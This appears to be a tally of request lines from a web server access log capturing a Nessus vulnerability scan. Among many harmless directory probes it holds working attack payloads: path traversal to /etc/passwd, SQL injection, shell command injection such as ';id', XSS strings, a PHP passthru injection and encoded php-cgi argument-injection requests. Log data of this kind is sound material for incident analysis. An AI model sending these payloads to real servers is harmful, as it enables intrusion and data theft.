1 GET /weblog/admin/index.php?cmd=login HTTP/1.1
1 GET /weblogs/ HTTP/1.1
2 GET /webmail/ HTTP/1.1
1 GET /webmail/error.php?selected_theme=%3cscript%3ealert%28uebimiau_selected_theme_xss.nasl%29%3c%2fscript%3e HTTP/1.1
1 GET /webmail/index.php HTTP/1.1
1 GET /webmail/src/login.php HTTP/1.1
1 GET /webman/info.cgi?host= HTTP/1.1
1 GET /webmaster/ HTTP/1.1
1 GET /webmaster_logs/ HTTP/1.1
1 GET /webpages/ HTTP/1.1
1 GET /webpages/index.html HTTP/1.1
1 GET /webpages/login.html HTTP/1.1
1 GET /webpagetest/index.php HTTP/1.1
1 GET /webplus.exe?script=webplus_install_path.nasl HTTP/1.1
1 GET /webplus?script=/../../../../etc/passwd HTTP/1.1
1 GET /webpos/control/checkLogin HTTP/1.1
1 GET /webpub-ui/ HTTP/1.1
1 GET /webpub/ HTTP/1.1
1 GET /webreports/ HTTP/1.1
1 GET /webreps/ HTTP/1.1
1 GET /webshare/ HTTP/1.1
1 GET /website/ HTTP/1.1
1 GET /webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /webstat/ HTTP/1.1
1 GET /webstats/ HTTP/1.1
1 GET /webthings/ HTTP/1.1
1 GET /webthings/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
1 GET /webthings/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
1 GET /webtier/index.do HTTP/1.1
1 GET /webtools/control/checkLogin HTTP/1.1
1 GET /webtrace/ HTTP/1.1
1 GET /webtrends/ HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /webwho.pl HTTP/1.1
1 GET /welcome.action HTTP/1.1
1 GET /welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
1 GET /wg-cgi/webglimpse.cgi HTTP/1.1
1 GET /whois.cgi?action=load&whois=%3Bid HTTP/1.1
7 GET /whois.cgi HTTP/1.1
1 GET /whois.php?query=|id HTTP/1.1
1 GET /whois_raw.cgi?fqdn=%0Aid HTTP/1.1
2 GET /wihphoto/start.php HTTP/1.1
1 GET /wiki.php/<script>foo</script> HTTP/1.1
1 GET /wiki/500page.jsp HTTP/1.1
1 GET /wiki/?title=Special:Recentchanges&feed=atom HTTP/1.1
1 GET /wiki/Edit.jsp?Page=Main HTTP/1.1
1 GET /wiki/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
1 GET /wiki/RELEASE-NOTES HTTP/1.1
1 GET /wiki/SystemInfo HTTP/1.1
2 GET /wiki/ HTTP/1.1
2 GET /wiki/bin/ HTTP/1.1
1 GET /wiki/bin/view/System/WebHome?rev=1 HTTP/1.1
1 GET /wiki/bin/view/TWiki/WebHome HTTP/1.1
1 GET /wiki/doku.php HTTP/1.1
1 GET /wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
1 GET /wiki/index.php HTTP/1.1
1 GET /wiki/login.action HTTP/1.1
1 GET /wiki/mw-config HTTP/1.1
1 GET /wiki/pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
1 GET /wiki/pmwiki.php HTTP/1.1
1 GET /wiki/rankings.php HTTP/1.1
1 GET /wiki/search.aspx HTTP/1.1
1 GET /wiki/search.cfm HTTP/1.1
1 GET /wiki/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
1 GET /wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
1 GET /wikka/ HTTP/1.1
1 GET /wikka/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
1 GET /windows/ HTTP/1.1
1 GET /wizard/index.php HTTP/1.1
1 GET /wls-wsat/CoordinatorPortType HTTP/1.1
1 GET /wls_utc/ HTTP/1.1
1 GET /word/ HTTP/1.1
2 GET /wordpress/ HTTP/1.1
1 GET /wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
1 GET /wordtrans/ HTTP/1.1
1 GET /wordtrans/wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
1 GET /work/ HTTP/1.1
1 GET /workeffort/control/checkLogin HTTP/1.1
1 GET /workflow/servlet/ftpservlet HTTP/1.1
7 GET /wp-login.php HTTP/1.1
1 GET /wps/portal_dojo/layerLoader.jsp?path=file:///etc/passwd%00 HTTP/1.1
1 GET /wps/portal_dojo/layerLoader.jsp?path=file:/etc/passwd%00 HTTP/1.1
1 GET /wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1717627953\")</script> HTTP/1.1
1 GET /wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
1 GET /wrcontrollite.ssi HTTP/1.1
1 GET /ws_utc/login.do HTTP/1.1
1 GET /wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /wsdocs/ HTTP/1.1
1 GET /wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /wstats/ HTTP/1.1
1 GET /wusage/ HTTP/1.1
1 GET /wws/ HTTP/1.1
1 GET /wws/remindpasswd HTTP/1.1
1 GET /wwsympa/ HTTP/1.1
1 GET /wwsympa/remindpasswd HTTP/1.1
1 GET /www-sql/ HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /www.83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /www/ HTTP/1.1
1 GET /www/delivery/ac.php?bannerid=-1717627913+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_GRNB5PWN]));die;/* HTTP/1.1
1 GET /www/delivery/ac.php?bannerid=-393+OR+1=1 HTTP/1.1
1 GET /www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /www/index.php HTTP/1.1
7 GET /wwwadmin.cgi HTTP/1.1
7 GET /wwwboard.cgi HTTP/1.1
1 GET /wwwboard.html HTTP/1.1
1 GET /wwwjoin/ HTTP/1.1
1 GET /wwwlog/ HTTP/1.1
1 GET /wwwstat/ HTTP/1.1
1 GET /wwwstats/ HTTP/1.1
1 GET /x-news/ HTTP/1.1
1 GET /x-news/x_news.php HTTP/1.1
1 GET /x2engine/login HTTP/1.1
1 GET /x2engine/page?view=about HTTP/1.1
1 GET /x7chat/ HTTP/1.1
1 GET /x7chat/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /x7chat/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1717627923%2c375055929%20-- HTTP/1.1
1 GET /x7chat/upgradev1.php HTTP/1.1
1 GET /xGB/ HTTP/1.1
1 GET /x_news.php HTTP/1.1
1 GET /x_news/ HTTP/1.1
1 GET /x_news/x_news.php HTTP/1.1
1 GET /xampp/ HTTP/1.1
1 GET /xampp/adodb.php HTTP/1.1
7 GET /xampp/cgi.cgi HTTP/1.1
1 GET /xampp/editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1717627989.php%2e HTTP/1.1
1 GET /xampp/index.php HTTP/1.1
1 GET /xampp/phpldapadmin/ HTTP/1.1
1 GET /xampp/phpldapadmin/index.php HTTP/1.1
1 GET /xampp/pla/ HTTP/1.1
1 GET /xampp/pla/index.php HTTP/1.1
1 GET /xampp/start.php HTTP/1.1
1 GET /xaradodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /xaradodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /xaraya/ HTTP/1.1
1 GET /xaraya/index.php HTTP/1.1
1 GET /xmb/ HTTP/1.1
1 GET /xmb/admin.php?action=viewpro&member=admin<script>x</script> HTTP/1.1
1 GET /xmb/buddy.php?action=<script>x</script> HTTP/1.1
1 GET /xmb/forumdisplay.php?fid=21\"><script>x</script> HTTP/1.1
2 GET /xmb/misc.php?action=login HTTP/1.1
1 GET /xml/ HTTP/1.1
2 GET /xmldata?item=All HTTP/1.1
1 GET /xmldata?item=all HTTP/1.1
1 GET /xmlpserver/ HTTP/1.1
1 GET /xnews/ HTTP/1.1
1 GET /xnews/x_news.php HTTP/1.1
1 GET /xoops/ HTTP/1.1
1 GET /xoops/lostpass.php HTTP/1.1
1 GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.1
1 GET /xtemp/ HTTP/1.1
1 GET /yFHANyBg.aspx HTTP/1.1
2 GET /yabb/YaBB.pl HTTP/1.1
1 GET /yabb/ HTTP/1.1
1 GET /yabb2/ HTTP/1.1
1 GET /yabbse/ HTTP/1.1
1 GET /yabbse/index.php?action=logout&sesc=1 HTTP/1.1
1 GET /yabbse/index.php?board=nonexistant1242289726 HTTP/1.1
2 GET /yabbse/index.php HTTP/1.1
2 GET /yapig/ HTTP/1.1
1 GET /yappa-ng/ HTTP/1.1
1 GET /yappa-ng/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /yappa-ng/index.php HTTP/1.1
1 GET /yappa/ HTTP/1.1
1 GET /yappa/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /yappa/index.php HTTP/1.1
1 GET /yui/build/charts/assets/charts.swf HTTP/1.1
1 GET /yui/build/swfstore/swfstore.swf HTTP/1.1
1 GET /yui/build/uploader/assets/uploader.swf HTTP/1.1
1 GET /zabbix/ HTTP/1.1
1 GET /zabbix/index.php HTTP/1.1
1 GET /zb41/ HTTP/1.1
1 GET /zboard/ HTTP/1.1
1 GET /zboard/check_user_id.php?user_id=<script>foo</script> HTTP/1.1
2 GET /zen-cart/ HTTP/1.1
1 GET /zen/ HTTP/1.1
2 GET /zencart/ HTTP/1.1
2 GET /zenphoto/ HTTP/1.1
1 GET /zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
1 GET /zipfiles/ HTTP/1.1
1 GET /zixforum/ HTTP/1.1
1 GET /zixforum/news.mdb HTTP/1.1
1 GET /zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /zpanel.php?page=/etc/passwd%00 HTTP/1.1
1 GET /zpanel/ HTTP/1.1
1 GET /zpanel/zpanel.php?page=/etc/passwd%00 HTTP/1.1
1 GET /~1/ HTTP/1.1
1 GET /~admin/ HTTP/1.1
1 GET /~log/ HTTP/1.1
1 GET /~nobody/etc/passwd HTTP/1.1
1 GET /~root/ HTTP/1.1
1 GET /~stats/ HTTP/1.1
1 GET /~webstats/ HTTP/1.1
1 GET /~wsdocs/ HTTP/1.1
1 GET 1717627965:@34.68.118.83/ HTTP/1.1
1 GET 1717627965:@34.68.118.83/
3 GET <IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
3 GET <meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
3 GET <script>cross_site_scripting.nasl</script> HTTP/1.1
3 GET <script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET admin/index.php HTTP/1.1
1 GET c:\\boot.ini HTTP/1.1
1 GET elearning/index.php HTTP/1.1
1 GET faq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
1 GET http[:]//83[.]118[.]68[.]34.bc.googleusercontent.com/authentication/login/ HTTP/1.1
1 GET http[:]//rfi[.]nessus[.]org/check_proxy.html HTTP/1.0
1 GET multihtml.pl?multi=/etc/passwd%00html HTTP/1.1
1 HEAD / HTTP/1.1\n
1 HEAD / HTTP/1.1
1 HEAD /admin/4ghjig3F.htm HTTP/1.1
1 HEAD /administrator/PE5p3rXa.htm HTTP/1.1
1 HEAD /bYvTnJuH.htm HTTP/1.1
1 HEAD /cgi-bin/8nWK_13r.htm HTTP/1.1
1 HEAD /db/o7LCQt3q.htm HTTP/1.1
1 HEAD /file/SSiqsE8j.htm HTTP/1.1
1 HEAD /icons/u1quIJcl.htm HTTP/1.1
1 HEAD /images/pTcJweRJ.htm HTTP/1.1
1 HEAD /manager/jmrwHjG5.htm HTTP/1.1
1 HEAD /mysql/k37dAoEg.htm HTTP/1.1
1 HEAD /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 HEAD /pma/gSyfwTnT.htm HTTP/1.1
1 HEAD /someunexistantstuff.exe HTTP/1.1
1 HEAD /someunexistantstuff10775156111830703992.html HTTP/1.1
1 HTJGKA / HTTP/1.1
1 INDEX /admin/4ghjig3F.htm HTTP/1.1
1 INDEX /administrator/PE5p3rXa.htm HTTP/1.1
1 INDEX /bYvTnJuH.htm HTTP/1.1
1 INDEX /cgi-bin/8nWK_13r.htm HTTP/1.1
1 INDEX /db/o7LCQt3q.htm HTTP/1.1
1 INDEX /file/SSiqsE8j.htm HTTP/1.1
1 INDEX /icons/u1quIJcl.htm HTTP/1.1
1 INDEX /images/pTcJweRJ.htm HTTP/1.1
1 INDEX /manager/jmrwHjG5.htm HTTP/1.1
1 INDEX /mysql/k37dAoEg.htm HTTP/1.1
1 INDEX /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 INDEX /pma/gSyfwTnT.htm HTTP/1.1
1 LABEL /admin/4ghjig3F.htm HTTP/1.1
1 LABEL /administrator/PE5p3rXa.htm HTTP/1.1
1 LABEL /bYvTnJuH.htm HTTP/1.1
1 LABEL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 LABEL /db/o7LCQt3q.htm HTTP/1.1
1 LABEL /file/SSiqsE8j.htm HTTP/1.1
1 LABEL /icons/u1quIJcl.htm HTTP/1.1
1 LABEL /images/pTcJweRJ.htm HTTP/1.1
1 LABEL /manager/jmrwHjG5.htm HTTP/1.1
1 LABEL /mysql/k37dAoEg.htm HTTP/1.1
1 LABEL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 LABEL /pma/gSyfwTnT.htm HTTP/1.1
1 LOCK /admin/4ghjig3F.htm HTTP/1.1
1 LOCK /administrator/PE5p3rXa.htm HTTP/1.1
1 LOCK /bYvTnJuH.htm HTTP/1.1
1 LOCK /cgi-bin/8nWK_13r.htm HTTP/1.1
1 LOCK /db/o7LCQt3q.htm HTTP/1.1
1 LOCK /file/SSiqsE8j.htm HTTP/1.1
1 LOCK /icons/u1quIJcl.htm HTTP/1.1
1 LOCK /images/pTcJweRJ.htm HTTP/1.1
1 LOCK /manager/jmrwHjG5.htm HTTP/1.1
1 LOCK /mysql/k37dAoEg.htm HTTP/1.1
1 LOCK /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 LOCK /pma/gSyfwTnT.htm HTTP/1.1
1 MERGE /admin/4ghjig3F.htm HTTP/1.1
1 MERGE /administrator/PE5p3rXa.htm HTTP/1.1
1 MERGE /bYvTnJuH.htm HTTP/1.1
1 MERGE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 MERGE /db/o7LCQt3q.htm HTTP/1.1
1 MERGE /file/SSiqsE8j.htm HTTP/1.1
1 MERGE /icons/u1quIJcl.htm HTTP/1.1
1 MERGE /images/pTcJweRJ.htm HTTP/1.1
1 MERGE /manager/jmrwHjG5.htm HTTP/1.1
1 MERGE /mysql/k37dAoEg.htm HTTP/1.1
1 MERGE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 MERGE /pma/gSyfwTnT.htm HTTP/1.1
1 MKACTIVITY /admin/4ghjig3F.htm HTTP/1.1
1 MKACTIVITY /administrator/PE5p3rXa.htm HTTP/1.1
1 MKACTIVITY /bYvTnJuH.htm HTTP/1.1
1 MKACTIVITY /cgi-bin/8nWK_13r.htm HTTP/1.1
1 MKACTIVITY /db/o7LCQt3q.htm HTTP/1.1
1 MKACTIVITY /file/SSiqsE8j.htm HTTP/1.1
1 MKACTIVITY /icons/u1quIJcl.htm HTTP/1.1
1 MKACTIVITY /images/pTcJweRJ.htm HTTP/1.1
1 MKACTIVITY /manager/jmrwHjG5.htm HTTP/1.1
1 MKACTIVITY /mysql/k37dAoEg.htm HTTP/1.1
1 MKACTIVITY /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 MKACTIVITY /pma/gSyfwTnT.htm HTTP/1.1
1 MKCOL /admin/4ghjig3F.htm HTTP/1.1
1 MKCOL /administrator/PE5p3rXa.htm HTTP/1.1
1 MKCOL /bYvTnJuH.htm HTTP/1.1
1 MKCOL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 MKCOL /db/o7LCQt3q.htm HTTP/1.1
1 MKCOL /file/SSiqsE8j.htm HTTP/1.1
1 MKCOL /icons/u1quIJcl.htm HTTP/1.1
1 MKCOL /images/pTcJweRJ.htm HTTP/1.1
1 MKCOL /manager/jmrwHjG5.htm HTTP/1.1
1 MKCOL /mysql/k37dAoEg.htm HTTP/1.1
1 MKCOL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 MKCOL /pma/gSyfwTnT.htm HTTP/1.1
1 MKWORKSPACE /admin/4ghjig3F.htm HTTP/1.1
1 MKWORKSPACE /administrator/PE5p3rXa.htm HTTP/1.1
1 MKWORKSPACE /bYvTnJuH.htm HTTP/1.1
1 MKWORKSPACE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 MKWORKSPACE /db/o7LCQt3q.htm HTTP/1.1
1 MKWORKSPACE /file/SSiqsE8j.htm HTTP/1.1
1 MKWORKSPACE /icons/u1quIJcl.htm HTTP/1.1
1 MKWORKSPACE /images/pTcJweRJ.htm HTTP/1.1
1 MKWORKSPACE /manager/jmrwHjG5.htm HTTP/1.1
1 MKWORKSPACE /mysql/k37dAoEg.htm HTTP/1.1
1 MKWORKSPACE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 MKWORKSPACE /pma/gSyfwTnT.htm HTTP/1.1
1 MOVE /admin/4ghjig3F.htm HTTP/1.1
1 MOVE /administrator/PE5p3rXa.htm HTTP/1.1
1 MOVE /bYvTnJuH.htm HTTP/1.1
1 MOVE /cgi-bin/8nWK_13r.htm HTTP/1.1
1 MOVE /db/o7LCQt3q.htm HTTP/1.1
1 MOVE /file/SSiqsE8j.htm HTTP/1.1
1 MOVE /icons/u1quIJcl.htm HTTP/1.1
1 MOVE /images/pTcJweRJ.htm HTTP/1.1
1 MOVE /manager/jmrwHjG5.htm HTTP/1.1
1 MOVE /mysql/k37dAoEg.htm HTTP/1.1
1 MOVE /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 MOVE /pma/gSyfwTnT.htm HTTP/1.1
1 NESSUS / HTTP/1.0
1 NOTIFY /admin/4ghjig3F.htm HTTP/1.1
1 NOTIFY /administrator/PE5p3rXa.htm HTTP/1.1
1 NOTIFY /bYvTnJuH.htm HTTP/1.1
1 NOTIFY /cgi-bin/8nWK_13r.htm HTTP/1.1
1 NOTIFY /db/o7LCQt3q.htm HTTP/1.1
1 NOTIFY /file/SSiqsE8j.htm HTTP/1.1
1 NOTIFY /icons/u1quIJcl.htm HTTP/1.1
1 NOTIFY /images/pTcJweRJ.htm HTTP/1.1
1 NOTIFY /manager/jmrwHjG5.htm HTTP/1.1
1 NOTIFY /mysql/k37dAoEg.htm HTTP/1.1
1 NOTIFY /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 NOTIFY /pma/gSyfwTnT.htm HTTP/1.1
2 OPTIONS * HTTP/1.1
2 OPTIONS / HTTP/1.1
1 OPTIONS /admin/4ghjig3F.htm HTTP/1.1
2 OPTIONS /admin/ HTTP/1.1
1 OPTIONS /administrator/PE5p3rXa.htm HTTP/1.1
2 OPTIONS /administrator/ HTTP/1.1
1 OPTIONS /bYvTnJuH.htm HTTP/1.1
1 OPTIONS /cgi-bin/8nWK_13r.htm HTTP/1.1
2 OPTIONS /cgi-bin/ HTTP/1.1
2 OPTIONS /db/ HTTP/1.1
1 OPTIONS /db/o7LCQt3q.htm HTTP/1.1
1 OPTIONS /file/SSiqsE8j.htm HTTP/1.1
2 OPTIONS /file/ HTTP/1.1
2 OPTIONS /icons/ HTTP/1.1
1 OPTIONS /icons/u1quIJcl.htm HTTP/1.1
2 OPTIONS /images/ HTTP/1.1
1 OPTIONS /images/pTcJweRJ.htm HTTP/1.1
2 OPTIONS /manager/ HTTP/1.1
1 OPTIONS /manager/jmrwHjG5.htm HTTP/1.1
2 OPTIONS /mysql/ HTTP/1.1
1 OPTIONS /mysql/k37dAoEg.htm HTTP/1.1
2 OPTIONS /phpmyadmin/ HTTP/1.1
1 OPTIONS /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
2 OPTIONS /pma/ HTTP/1.1
1 OPTIONS /pma/gSyfwTnT.htm HTTP/1.1
1 ORDERPATCH /admin/4ghjig3F.htm HTTP/1.1
1 ORDERPATCH /administrator/PE5p3rXa.htm HTTP/1.1
1 ORDERPATCH /bYvTnJuH.htm HTTP/1.1
1 ORDERPATCH /cgi-bin/8nWK_13r.htm HTTP/1.1
1 ORDERPATCH /db/o7LCQt3q.htm HTTP/1.1
1 ORDERPATCH /file/SSiqsE8j.htm HTTP/1.1
1 ORDERPATCH /icons/u1quIJcl.htm HTTP/1.1
1 ORDERPATCH /images/pTcJweRJ.htm HTTP/1.1
1 ORDERPATCH /manager/jmrwHjG5.htm HTTP/1.1
1 ORDERPATCH /mysql/k37dAoEg.htm HTTP/1.1
1 ORDERPATCH /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 ORDERPATCH /pma/gSyfwTnT.htm HTTP/1.1
1 PATCH /admin/4ghjig3F.htm HTTP/1.1
1 PATCH /administrator/PE5p3rXa.htm HTTP/1.1
1 PATCH /bYvTnJuH.htm HTTP/1.1
1 PATCH /cgi-bin/8nWK_13r.htm HTTP/1.1
1 PATCH /db/o7LCQt3q.htm HTTP/1.1
1 PATCH /file/SSiqsE8j.htm HTTP/1.1
1 PATCH /icons/u1quIJcl.htm HTTP/1.1
1 PATCH /images/pTcJweRJ.htm HTTP/1.1
1 PATCH /manager/jmrwHjG5.htm HTTP/1.1
1 PATCH /mysql/k37dAoEg.htm HTTP/1.1
1 PATCH /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 PATCH /pma/gSyfwTnT.htm HTTP/1.1
1 POLL /admin/4ghjig3F.htm HTTP/1.1
1 POLL /administrator/PE5p3rXa.htm HTTP/1.1
1 POLL /bYvTnJuH.htm HTTP/1.1
1 POLL /cgi-bin/8nWK_13r.htm HTTP/1.1
1 POLL /db/o7LCQt3q.htm HTTP/1.1
1 POLL /file/SSiqsE8j.htm HTTP/1.1
1 POLL /icons/u1quIJcl.htm HTTP/1.1
1 POLL /images/pTcJweRJ.htm HTTP/1.1
1 POLL /manager/jmrwHjG5.htm HTTP/1.1
1 POLL /mysql/k37dAoEg.htm HTTP/1.1
1 POLL /phpmyadmin/m1Qc9k1J.htm HTTP/1.1
1 POLL /pma/gSyfwTnT.htm HTTP/1.1
1 POST /%70%68%70%70%61%74%68/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
1 POST /EucalyptusWebBackend HTTP/1.1
1 POST /FormHandler.cgi HTTP/1.1
1 POST /admin/4ghjig3F.htm HTTP/1.1
1 POST /administrator/PE5p3rXa.htm HTTP/1.1
1 POST /api/login/ HTTP/1.1
1 POST /av-centerd HTTP/1.1
1 POST /bYvTnJuH.htm HTTP/1.1
1 POST /blazeds/messagebroker/http HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/8nWK_13r.htm HTTP/1.1
1 POST /cgi-bin/EucalyptusWebBackend HTTP/1.1
1 POST /cgi-bin/file_transfer.cgi HTTP/1.1
1 POST /cgi-bin/formmail.pl HTTP/1.0
1 POST /cgi-bin/formmail HTTP/1.0
1 POST /cgi-bin/getpassword.php HTTP/1.1
3 POST /cgi-bin/index.php HTTP/1.1
1 POST /cgi-bin/kb.cgi?view='&lang=en HTTP/1.1
1 POST /cgi-bin/login.php HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
1 POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
1 POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
